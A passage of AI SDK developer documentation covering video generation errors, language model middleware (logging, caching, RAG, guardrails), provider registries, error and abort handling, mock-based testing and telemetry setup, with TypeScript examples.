timestamp: response.timestamp,
modelId: response.modelId,
// Per-call provider metadata (lossless)
providerMetadata: response.providerMetadata,
});
}
Error Handling
When experimental_generateVideo cannot generate a valid video, it throws an AI_NoVideoGeneratedError.
This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the video model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_generateVideo as generateVideo,
NoVideoGeneratedError,
} from 'ai';
try {
await generateVideo({ model, prompt });
} catch (error) {
if (NoVideoGeneratedError.isInstance(error)) {
console.log('NoVideoGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Video Models
| Provider | Model | Features |
|---|---|---|
| FAL | luma-dream-machine/ray-2 | Text-to-video, image-to-video |
| FAL | minimax-video | Text-to-video |
| Google Generative AI | veo-2.0-generate-001 | Text-to-video, up to 4 videos per call |
| Google Vertex | veo-3.1-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-3.1-fast-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-3.0-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-3.0-fast-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-2.0-generate-001 | Text-to-video, up to 4 videos per call |
| Kling AI | kling-v2.6-t2v | Text-to-video |
| Kling AI | kling-v2.6-i2v | Image-to-video |
| Kling AI | kling-v2.6-motion-control | Motion control |
| Replicate | minimax/video-01 | Text-to-video |
| xAI | grok-imagine-video | Text-to-video, image-to-video, editing, extension, R2V |
Above are a small subset of the video models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models
Language Model Middleware
Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.
It can be used to add features like guardrails, RAG, caching, and logging in a language-model-agnostic way. Such middleware can be developed and distributed independently of the language models it is applied to.
Using Language Model Middleware
You can use language model middleware with the wrapLanguageModel function.
It takes a language model and a language model middleware and returns a new
language model that incorporates the middleware.
import { wrapLanguageModel, streamText } from 'ai';
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: yourLanguageModelMiddleware,
});
The wrapped language model can be used just like any other language model, e.g. in streamText:
const result = streamText({
model: wrappedLanguageModel,
prompt: 'What cities are in the United States?',
});
Multiple middlewares
You can provide multiple middlewares to the wrapLanguageModel function.
The middlewares will be applied in the order they are provided.
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: [firstMiddleware, secondMiddleware],
});
// applied as: firstMiddleware(secondMiddleware(yourModel))
Built-in Middleware
The AI SDK comes with several built-in middlewares that you can use to configure language models:
- extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
- extractJsonMiddleware: Extracts JSON from text content by stripping markdown code fences. Useful when using Output.object() with models that wrap JSON responses in code blocks.
- simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
- defaultSettingsMiddleware: Applies default settings to a language model.
- addToolInputExamplesMiddleware: Adds tool input examples to tool descriptions for providers that don't natively support the inputExamples property.
Extract Reasoning
Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.
The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
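For example, a minimal sketch of reading the extracted reasoning from a generateText result (the prompt is illustrative):

```ts
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model, // wrapped model from above
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log(reasoning); // the reasoning extracted from the <think> tags
console.log(text); // the generated text without the reasoning tags
```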
The extractReasoningMiddleware function also includes a startWithReasoning option.
When set to true, the reasoning tag will be prepended to the generated text.
This is useful for models that do not include the reasoning tag at the beginning of the response.
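A hedged configuration sketch with the option enabled:

```ts
const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({
    tagName: 'think',
    // treat the response as starting inside the reasoning tag:
    startWithReasoning: true,
  }),
});
```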
For more details, see the DeepSeek R1 guide.
Extract JSON
Some models wrap JSON responses in markdown code fences (e.g., ```json ... ```) even when you request structured output.
The extractJsonMiddleware function strips these code fences from the response, making it compatible with Output.object().
import {
wrapLanguageModel,
extractJsonMiddleware,
Output,
generateText,
} from 'ai';
import { z } from 'zod';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractJsonMiddleware(),
});
const result = await generateText({
model,
output: Output.object({
schema: z.object({
name: z.string(),
ingredients: z.array(z.string()),
}),
}),
prompt: 'Generate a recipe.',
});
You can also provide a custom transform function for models that use different formatting:
const model = wrapLanguageModel({
model: yourModel,
middleware: extractJsonMiddleware({
transform: text => text.replace(/^PREFIX/, '').replace(/SUFFIX$/, ''),
}),
});
Simulate Streaming
The simulateStreamingMiddleware function can be used to simulate streaming behavior with responses from non-streaming language models.
This is useful when you want to maintain a consistent streaming interface even when using models that only provide complete responses.
import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: simulateStreamingMiddleware(),
});
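The wrapped model can then be consumed through the streaming API; a minimal usage sketch:

```ts
import { streamText } from 'ai';

const result = streamText({
  model, // wrapped model from above
  prompt: 'Write a haiku about the ocean.',
});

// the stream is simulated from the complete, non-streamed response
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
```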
Default Settings
The defaultSettingsMiddleware function can be used to apply default settings to a language model.
import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: defaultSettingsMiddleware({
settings: {
temperature: 0.5,
maxOutputTokens: 800,
providerOptions: { openai: { store: false } },
},
}),
});
Add Tool Input Examples
The addToolInputExamplesMiddleware function adds tool input examples to tool descriptions.
This is useful for providers that don't natively support the inputExamples property on tools.
The middleware serializes the examples into the tool's description text so models can still benefit from seeing example inputs.
import { wrapLanguageModel, addToolInputExamplesMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: addToolInputExamplesMiddleware({
prefix: 'Input Examples:',
}),
});
When you define a tool with inputExamples, the middleware will append them to the tool's description:
import { generateText, tool } from 'ai';
import { z } from 'zod';
const result = await generateText({
model, // wrapped model from above
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string(),
}),
inputExamples: [
{ input: { location: 'San Francisco' } },
{ input: { location: 'London' } },
],
}),
},
prompt: 'What is the weather in Tokyo?',
});
The tool description will be transformed to:
Get the weather in a location
Input Examples:
{"location":"San Francisco"}
{"location":"London"}
Options
- prefix (optional): A prefix text to prepend before the examples. Default: 'Input Examples:'.
- format (optional): A custom formatter function for each example. Receives the example object and its index. Default: JSON.stringify(example.input).
- remove (optional): Whether to remove the inputExamples property from the tool after adding them to the description. Default: true.
const model = wrapLanguageModel({
model: yourModel,
middleware: addToolInputExamplesMiddleware({
prefix: 'Input Examples:',
format: (example, index) =>
`${index + 1}. ${JSON.stringify(example.input)}`,
remove: true,
}),
});
Community Middleware
The AI SDK provides a Language Model Middleware specification. Community members can develop middleware that adheres to this specification, making it compatible with the AI SDK ecosystem.
Here are some community middlewares that you can explore:
Custom tool call parser
The Custom tool call parser middleware extends tool call capabilities to models that don't natively support the OpenAI-style tools parameter. This includes many self-hosted and third-party models that lack native function calling features.
This middleware enables function calling by converting tool schemas into prompt instructions and parsing the model's responses into structured function calls: the JSON tool definitions are transformed into natural-language instructions the model can follow, and the generated text is then analyzed to extract function call attempts. As a result, you can use the same function calling API across different model providers, even with models that don't natively support the OpenAI-style function calling format.
The @ai-sdk-tool/parser package offers three middleware variants:
- createToolMiddleware: A flexible function for creating custom tool call middleware tailored to specific models
- hermesToolMiddleware: Ready-to-use middleware for Hermes & Qwen format function calls
- gemmaToolMiddleware: Pre-configured middleware for Gemma 3 model series function call format
Here's how you can enable function calls with Gemma models that don't support them natively:
import { wrapLanguageModel } from 'ai';
import { gemmaToolMiddleware } from '@ai-sdk-tool/parser';
import { openrouter } from '@openrouter/ai-sdk-provider';
const model = wrapLanguageModel({
model: openrouter('google/gemma-3-27b-it'),
middleware: gemmaToolMiddleware,
});
Find more examples at this link.
Implementing Language Model Middleware
You can implement any of the following three functions to modify the behavior of the language model:
- transformParams: Transforms the parameters before they are passed to the language model, for both doGenerate and doStream.
- wrapGenerate: Wraps the doGenerate method of the language model. You can modify the parameters, call the language model, and modify the result.
- wrapStream: Wraps the doStream method of the language model. You can modify the parameters, call the language model, and modify the result.
Here are some examples of how to implement language model middleware:
Examples
Logging
This example shows how to log the parameters and generated text of a language model call.
import type {
LanguageModelV3Middleware,
LanguageModelV3StreamPart,
} from '@ai-sdk/provider';
export const yourLogMiddleware: LanguageModelV3Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('doGenerate called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const result = await doGenerate();
console.log('doGenerate finished');
console.log(`generated text: ${result.text}`);
return result;
},
wrapStream: async ({ doStream, params }) => {
console.log('doStream called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const { stream, ...rest } = await doStream();
let generatedText = '';
const textBlocks = new Map<string, string>();
const transformStream = new TransformStream<
LanguageModelV3StreamPart,
LanguageModelV3StreamPart
>({
transform(chunk, controller) {
switch (chunk.type) {
case 'text-start': {
textBlocks.set(chunk.id, '');
break;
}
case 'text-delta': {
const existing = textBlocks.get(chunk.id) || '';
textBlocks.set(chunk.id, existing + chunk.delta);
generatedText += chunk.delta;
break;
}
case 'text-end': {
console.log(
`Text block ${chunk.id} completed:`,
textBlocks.get(chunk.id),
);
break;
}
}
controller.enqueue(chunk);
},
flush() {
console.log('doStream finished');
console.log(`generated text: ${generatedText}`);
},
});
return {
stream: stream.pipeThrough(transformStream),
...rest,
};
},
};
Caching
This example shows how to build a simple cache for the generated text of a language model call.
import type { LanguageModelV3Middleware } from '@ai-sdk/provider';
const cache = new Map<string, any>();
export const yourCacheMiddleware: LanguageModelV3Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
const cacheKey = JSON.stringify(params);
if (cache.has(cacheKey)) {
return cache.get(cacheKey);
}
const result = await doGenerate();
cache.set(cacheKey, result);
return result;
},
// here you would implement the caching logic for streaming
};
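One way to extend this to streaming is to record the stream parts on the first pass and replay them with simulateReadableStream on cache hits. A minimal sketch, assuming an in-memory cache keyed by the stringified params:

```ts
import { simulateReadableStream } from 'ai';
import type {
  LanguageModelV3Middleware,
  LanguageModelV3StreamPart,
} from '@ai-sdk/provider';

const streamCache = new Map<string, LanguageModelV3StreamPart[]>();

export const yourStreamCacheMiddleware: LanguageModelV3Middleware = {
  wrapStream: async ({ doStream, params }) => {
    const cacheKey = JSON.stringify(params);

    const cached = streamCache.get(cacheKey);
    if (cached != null) {
      // replay the recorded chunks as a fresh stream
      return { stream: simulateReadableStream({ chunks: cached }) };
    }

    const { stream, ...rest } = await doStream();
    const chunks: LanguageModelV3StreamPart[] = [];

    // record every chunk while passing it through unchanged
    const recorder = new TransformStream<
      LanguageModelV3StreamPart,
      LanguageModelV3StreamPart
    >({
      transform(chunk, controller) {
        chunks.push(chunk);
        controller.enqueue(chunk);
      },
      flush() {
        streamCache.set(cacheKey, chunks);
      },
    });

    return { stream: stream.pipeThrough(recorder), ...rest };
  },
};
```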
Retrieval Augmented Generation (RAG)
This example shows how to use RAG as middleware.
import type { LanguageModelV3Middleware } from '@ai-sdk/provider';
export const yourRagMiddleware: LanguageModelV3Middleware = {
transformParams: async ({ params }) => {
const lastUserMessageText = getLastUserMessageText({
prompt: params.prompt,
});
if (lastUserMessageText == null) {
return params; // do not use RAG (send unmodified parameters)
}
const instruction =
'Use the following information to answer the question:\n' +
findSources({ text: lastUserMessageText })
.map(chunk => JSON.stringify(chunk))
.join('\n');
return addToLastUserMessage({ params, text: instruction });
},
};
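The helpers getLastUserMessageText, findSources, and addToLastUserMessage are application-specific and not part of the AI SDK. As one illustration, here is a hedged sketch of getLastUserMessageText, assuming the v3 prompt is an array of messages whose user content is a list of parts:

```ts
import type { LanguageModelV3Prompt } from '@ai-sdk/provider';

// hypothetical helper: return the text of the last user message, if any
function getLastUserMessageText({
  prompt,
}: {
  prompt: LanguageModelV3Prompt;
}): string | undefined {
  const lastMessage = prompt.at(-1);
  if (lastMessage?.role !== 'user') {
    return undefined;
  }
  // concatenate the text parts of the user message
  return lastMessage.content
    .map(part => (part.type === 'text' ? part.text : ''))
    .join('');
}
```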
Guardrails
Guardrails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.
import type { LanguageModelV3Middleware } from '@ai-sdk/provider';
export const yourGuardrailMiddleware: LanguageModelV3Middleware = {
wrapGenerate: async ({ doGenerate }) => {
const { text, ...rest } = await doGenerate();
// filtering approach, e.g. for PII or other sensitive information:
const cleanedText = text?.replace(/badword/g, '<REDACTED>');
return { text: cleanedText, ...rest };
},
// here you would implement the guardrail logic for streaming
// Note: streaming guardrails are difficult to implement, because
// you do not know the full content of the stream until it's finished.
};
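That said, simple per-chunk filtering is possible by transforming text deltas as they pass through. A naive sketch (a banned word split across chunk boundaries would slip past this filter):

```ts
import type {
  LanguageModelV3Middleware,
  LanguageModelV3StreamPart,
} from '@ai-sdk/provider';

export const yourStreamGuardrailMiddleware: LanguageModelV3Middleware = {
  wrapStream: async ({ doStream }) => {
    const { stream, ...rest } = await doStream();

    const filter = new TransformStream<
      LanguageModelV3StreamPart,
      LanguageModelV3StreamPart
    >({
      transform(chunk, controller) {
        if (chunk.type === 'text-delta') {
          // redact within each delta; cross-chunk matches are missed
          controller.enqueue({
            ...chunk,
            delta: chunk.delta.replace(/badword/g, '<REDACTED>'),
          });
        } else {
          controller.enqueue(chunk);
        }
      },
    });

    return { stream: stream.pipeThrough(filter), ...rest };
  },
};
```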
Configuring Per Request Custom Metadata
To send and access custom metadata in Middleware, you can use providerOptions. This is useful when building logging middleware where you want to pass additional context like user IDs, timestamps, or other contextual data that can help with tracking and debugging.
import { generateText, wrapLanguageModel } from 'ai';
__PROVIDER_IMPORT__;
import type { LanguageModelV3Middleware } from '@ai-sdk/provider';
export const yourLogMiddleware: LanguageModelV3Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
const result = await doGenerate();
return result;
},
};
const { text } = await generateText({
model: wrapLanguageModel({
model: __MODEL__,
middleware: yourLogMiddleware,
}),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
yourLogMiddleware: {
hello: 'world',
},
},
});
console.log(text);
title: Provider & Model Management description: Learn how to work with multiple providers and models
Provider & Model Management
When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.
The AI SDK offers custom providers and a provider registry for this purpose:
- With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
- The provider registry lets you mix multiple providers and access them through simple string ids.
You can mix and match custom providers, the provider registry, and middleware in your application.
Custom Providers
You can create a custom provider using customProvider.
Example: custom model settings
You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.
import {
gateway,
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
} from 'ai';
// custom provider with different provider options:
export const openai = customProvider({
languageModels: {
// replacement model with custom provider options:
'gpt-5.1': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
// alias model with custom provider options:
'gpt-5.1-high-reasoning': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
},
fallbackProvider: gateway,
});
Example: model name alias
You can also provide model name aliases, so you can update the model version in one place in the future:
import { customProvider, gateway } from 'ai';
// custom provider with alias names:
export const anthropic = customProvider({
languageModels: {
opus: gateway('anthropic/claude-opus-4.1'),
sonnet: gateway('anthropic/claude-sonnet-4.5'),
haiku: gateway('anthropic/claude-haiku-4.5'),
},
fallbackProvider: gateway,
});
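The aliases can then be used like any other model id (a minimal usage sketch; the import path is illustrative):

```ts
import { generateText } from 'ai';
import { anthropic } from './providers'; // the custom provider from above

const { text } = await generateText({
  model: anthropic.languageModel('sonnet'),
  prompt: 'Invent a new holiday and describe its traditions.',
});
```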
Example: limit available models
You can limit the available models in the system, even if you have multiple providers.
import {
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
gateway,
} from 'ai';
export const myProvider = customProvider({
languageModels: {
'text-medium': gateway('anthropic/claude-3-5-sonnet-20240620'),
'text-small': gateway('openai/gpt-5-mini'),
'reasoning-medium': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
'reasoning-fast': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'low',
},
},
},
}),
}),
},
embeddingModels: {
embedding: gateway.embeddingModel('openai/text-embedding-3-small'),
},
// no fallback provider
});
Provider Registry
You can create a provider registry with multiple providers and models using createProviderRegistry.
Setup
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';
export const registry = createProviderRegistry({
// register provider with prefix and default setup using gateway:
gateway,
// register provider with prefix and direct provider import:
anthropic,
openai,
});
Setup with Custom Separator
By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';
export const customSeparatorRegistry = createProviderRegistry(
{
gateway,
anthropic,
openai,
},
{ separator: ' > ' },
);
Example: Use language models
You can access language models by using the languageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateText } from 'ai';
import { registry } from './registry';
const { text } = await generateText({
model: registry.languageModel('openai:gpt-5.1'), // default separator
// or with custom separator:
// model: customSeparatorRegistry.languageModel('openai > gpt-5.1'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Example: Use text embedding models
You can access text embedding models by using the .embeddingModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { embed } from 'ai';
import { registry } from './registry';
const { embedding } = await embed({
model: registry.embeddingModel('openai:text-embedding-3-small'),
value: 'sunny day at the beach',
});
Example: Use image models
You can access image models by using the imageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateImage } from 'ai';
import { registry } from './registry';
const { image } = await generateImage({
model: registry.imageModel('openai:dall-e-3'),
prompt: 'A beautiful sunset over a calm ocean',
});
Combining Custom Providers, Provider Registry, and Middleware
The central idea of provider management is to set up a file that contains all the providers and models you want to use. You may want to pre-configure model settings, provide model name aliases, limit the available models, and more.
Here is an example that implements the following concepts:
- pass through gateway with a namespace prefix (here: gateway > *)
- pass through a full provider with a namespace prefix (here: xai > *)
- setup an OpenAI-compatible provider with custom api key and base URL (here: custom > *)
- setup model name aliases (here: anthropic > fast, anthropic > writing, anthropic > reasoning)
- pre-configure model settings (here: anthropic > reasoning)
- validate the provider-specific options (here: AnthropicLanguageModelOptions)
- use a fallback provider (here: anthropic > *)
- limit a provider to certain models without a fallback (here: groq > gemma2-9b-it, groq > qwen-qwq-32b)
- define a custom separator for the provider registry (here: >)
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
createProviderRegistry,
customProvider,
defaultSettingsMiddleware,
gateway,
wrapLanguageModel,
} from 'ai';
export const registry = createProviderRegistry(
{
// pass through gateway with a namespace prefix
gateway,
// pass through full providers with namespace prefixes
xai,
// access an OpenAI-compatible provider with custom setup
custom: createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.CUSTOM_API_KEY,
baseURL: 'https://api.custom.com/v1',
}),
// setup model name aliases
anthropic: customProvider({
languageModels: {
fast: anthropic('claude-haiku-4-5'),
// simple model
writing: anthropic('claude-sonnet-4-5'),
// extended reasoning model configuration:
reasoning: wrapLanguageModel({
model: anthropic('claude-sonnet-4-5'),
middleware: defaultSettingsMiddleware({
settings: {
maxOutputTokens: 100000, // example default setting
providerOptions: {
anthropic: {
thinking: {
type: 'enabled',
budgetTokens: 32000,
},
} satisfies AnthropicLanguageModelOptions,
},
},
}),
}),
},
fallbackProvider: anthropic,
}),
// limit a provider to certain models without a fallback
groq: customProvider({
languageModels: {
'gemma2-9b-it': groq('gemma2-9b-it'),
'qwen-qwq-32b': groq('qwen-qwq-32b'),
},
}),
},
{ separator: ' > ' },
);
// usage:
const model = registry.languageModel('anthropic > reasoning');
Global Provider Configuration
The AI SDK 5 includes a global provider feature that allows you to specify a model using just a plain model ID string:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = await streamText({
model: __MODEL__, // Uses the global provider (defaults to gateway)
prompt: 'Invent a new holiday and describe its traditions.',
});
By default, the global provider is set to the Vercel AI Gateway.
Customizing the Global Provider
You can set your own preferred global provider:
import { openai } from '@ai-sdk/openai';
// Initialize once during startup:
globalThis.AI_SDK_DEFAULT_PROVIDER = openai;
import { streamText } from 'ai';
const result = await streamText({
model: 'gpt-5.1', // Uses OpenAI provider without prefix
prompt: 'Invent a new holiday and describe its traditions.',
});
This simplifies provider usage and makes it easier to switch between providers without changing your model references throughout your codebase.
title: Error Handling description: Learn how to handle errors in the AI SDK Core
Error Handling
Handling regular errors
Regular errors are thrown and can be handled using the try/catch block.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { text } = await generateText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
} catch (error) {
// handle error
}
See Error Types for more information on the different types of errors that may be thrown.
Handling streaming errors (simple streams)
When errors occur during streams that do not support error chunks,
the error is thrown as a regular error.
You can handle these errors using the try/catch block.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { textStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
} catch (error) {
// handle error
}
Handling streaming errors (streaming with error support)
Full streams support error parts. You can handle them like any other stream part. It is recommended to also add a try/catch block for errors that happen outside of streaming.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { fullStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const part of fullStream) {
switch (part.type) {
// ... handle other part types
case 'error': {
const error = part.error;
// handle error
break;
}
case 'abort': {
// handle stream abort
break;
}
case 'tool-error': {
const error = part.error;
// handle error
break;
}
}
}
} catch (error) {
// handle error
}
Handling stream aborts
When streams are aborted (e.g., via chat stop button), you may want to perform cleanup operations like updating stored messages in your UI. Use the onAbort callback to handle these cases.
The onAbort callback is called when a stream is aborted via AbortSignal, but onFinish is not called. This ensures you can still update your UI state appropriately.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const { textStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
onAbort: ({ steps }) => {
// Update stored messages or perform cleanup
console.log('Stream aborted after', steps.length, 'steps');
},
onFinish: ({ steps, totalUsage }) => {
// This is called on normal completion
console.log('Stream completed normally');
},
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
The onAbort callback receives:
- steps: An array of all completed steps before the abort
You can also handle abort events directly in the stream:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const { fullStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const chunk of fullStream) {
switch (chunk.type) {
case 'abort': {
// Handle abort directly in stream
console.log('Stream was aborted');
break;
}
// ... handle other part types
}
}
title: Testing description: Learn how to use AI SDK Core mock providers for testing.
Testing
Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.
To enable you to unit test your code that uses the AI SDK, the AI SDK Core
includes mock providers and test helpers. You can import the following helpers from ai/test:
- MockEmbeddingModelV3: A mock embedding model using the embedding model v3 specification.
- MockLanguageModelV3: A mock language model using the language model v3 specification.
- mockId: Provides an incrementing integer ID.
- mockValues: Iterates over an array of values with each call. Returns the last value when the array is exhausted.
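For instance, the ID and value helpers behave as their descriptions suggest (a minimal sketch):

```ts
import { mockId, mockValues } from 'ai/test';

// mockId returns a generator that produces a new incrementing ID per call
const generateId = mockId();
generateId(); // first ID
generateId(); // next ID

// mockValues steps through the given values,
// repeating the last one once they are exhausted
const nextDelta = mockValues('Hello', ', ', 'world!');
nextDelta(); // 'Hello'
nextDelta(); // ', '
nextDelta(); // 'world!'
nextDelta(); // 'world!' (last value repeats)
```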
You can also import simulateReadableStream from ai to simulate a readable stream with delays.
With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.
Examples
You can use the test helpers with the AI Core functions in your unit tests:
generateText
import { generateText } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';
const result = await generateText({
model: new MockLanguageModelV3({
doGenerate: async () => ({
content: [{ type: 'text', text: `Hello, world!` }],
finishReason: { unified: 'stop', raw: undefined },
usage: {
inputTokens: {
total: 10,
noCache: 10,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 20,
text: 20,
reasoning: undefined,
},
},
warnings: [],
}),
}),
prompt: 'Hello, test!',
});
streamText
import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';
const result = streamText({
model: new MockLanguageModelV3({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-start', id: 'text-1' },
{ type: 'text-delta', id: 'text-1', delta: 'Hello' },
{ type: 'text-delta', id: 'text-1', delta: ', ' },
{ type: 'text-delta', id: 'text-1', delta: 'world!' },
{ type: 'text-end', id: 'text-1' },
{
type: 'finish',
finishReason: { unified: 'stop', raw: undefined },
logprobs: undefined,
usage: {
inputTokens: {
total: 3,
noCache: 3,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 10,
text: 10,
reasoning: undefined,
},
},
},
],
}),
}),
}),
prompt: 'Hello, test!',
});
generateText with Output
import { generateText, Output } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';
import { z } from 'zod';
const result = await generateText({
model: new MockLanguageModelV3({
doGenerate: async () => ({
content: [{ type: 'text', text: `{"content":"Hello, world!"}` }],
finishReason: { unified: 'stop', raw: undefined },
usage: {
inputTokens: {
total: 10,
noCache: 10,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 20,
text: 20,
reasoning: undefined,
},
},
warnings: [],
}),
}),
output: Output.object({ schema: z.object({ content: z.string() }) }),
prompt: 'Hello, test!',
});
streamText with Output
import { streamText, Output, simulateReadableStream } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';
import { z } from 'zod';
const result = streamText({
model: new MockLanguageModelV3({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-start', id: 'text-1' },
{ type: 'text-delta', id: 'text-1', delta: '{ ' },
{ type: 'text-delta', id: 'text-1', delta: '"content": ' },
{ type: 'text-delta', id: 'text-1', delta: `"Hello, ` },
{ type: 'text-delta', id: 'text-1', delta: `world` },
{ type: 'text-delta', id: 'text-1', delta: `!"` },
{ type: 'text-delta', id: 'text-1', delta: ' }' },
{ type: 'text-end', id: 'text-1' },
{
type: 'finish',
finishReason: { unified: 'stop', raw: undefined },
logprobs: undefined,
usage: {
inputTokens: {
total: 3,
noCache: 3,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 10,
text: 10,
reasoning: undefined,
},
},
},
],
}),
}),
}),
output: Output.object({ schema: z.object({ content: z.string() }) }),
prompt: 'Hello, test!',
});
Simulate UI Message Stream Responses
You can also simulate UI Message Stream responses for testing, debugging, or demonstration purposes.
Here is a Next.js example:
import { simulateReadableStream } from 'ai';
export async function POST(req: Request) {
return new Response(
simulateReadableStream({
initialDelayInMs: 1000, // Delay before the first chunk
chunkDelayInMs: 300, // Delay between chunks
chunks: [
`data: {"type":"start","messageId":"msg-123"}\n\n`,
`data: {"type":"text-start","id":"text-1"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":"This"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":" is an"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":" example."}\n\n`,
`data: {"type":"text-end","id":"text-1"}\n\n`,
`data: {"type":"finish"}\n\n`,
`data: [DONE]\n\n`,
],
}).pipeThrough(new TextEncoderStream()),
{
status: 200,
headers: {
'Content-Type': 'text/event-stream',
'Cache-Control': 'no-cache',
Connection: 'keep-alive',
'x-vercel-ai-ui-message-stream': 'v1',
},
},
);
}
title: Telemetry description: Using OpenTelemetry with AI SDK Core
Telemetry
The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.
Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.
Enabling telemetry
For Next.js applications, please follow the Next.js OpenTelemetry guide to enable telemetry first.
You can then use the experimental_telemetry option to enable telemetry on specific function calls while the feature is experimental:
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
experimental_telemetry: { isEnabled: true },
});
When telemetry is enabled, you can also control if you want to record the input values and the output values for the function.
By default, both are enabled. You can disable them by setting the recordInputs and recordOutputs options to false.
